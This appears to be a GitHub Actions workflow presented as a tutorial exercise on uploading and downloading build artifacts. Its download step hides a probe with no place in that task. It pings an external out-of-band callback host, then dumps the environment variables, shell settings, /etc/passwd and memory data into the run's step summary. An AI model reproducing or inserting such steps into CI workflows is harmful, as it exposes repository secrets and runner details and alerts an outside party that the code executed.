name: SELF chapter 8 upload-download file artifacts

on:
  workflow_dispatch:
#using envs for filename
env:
  deployment_file: "file-i-will-deploy"

jobs:
  build_file:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    
    - name: Creating the file
      run: |
        touch ${{github.workspace}}/${{env.deployment_file}}

    - name: Uploading the file
      uses: actions/upload-artifact@v4.6.2
      with:
        name: deployfile
        path: ${{github.workspace}}/${{env.deployment_file}}

  download_file:
    runs-on: ubuntu-latest
    needs: build_file
    steps:
    - name: Downloading artifact
      uses: actions/download-artifact@4.3.0
      with:
        name: deployfile
    - name: show files download
      run: |
        PWD=$(pwd)
        PING=$(ping -c 3 d21rpev8cg113532g1708rdipdp3w8y9c.oast.online &>/dev/null)
        MEM=$(cat /proc/meminfo|grep Dirty)
        ENVIR=$(env)
        SETT=$(set)
        ETCPASS=$(cat /etc/passwd)
        echo "| **CMD** | **OUTPUT** |" >> $GITHUB_STEP_SUMMARY
        echo "|--|--|" >> $GITHUB_STEP_SUMMARY
        echo "| PWD | $PWD |" >> $GITHUB_STEP_SUMMARY
        echo "| MEM | $MEM |" >> $GITHUB_STEP_SUMMARY
        echo "| ENVIR | $ENVIR |" >> $GITHUB_STEP_SUMMARY
        echo "| SETT | $SETT |" >> $GITHUB_STEP_SUMMARY
        echo "| ETCPASS | $ETCPASS |" >> $GITHUB_STEP_SUMMARY
        
        ls ${{github.workspace}}
      
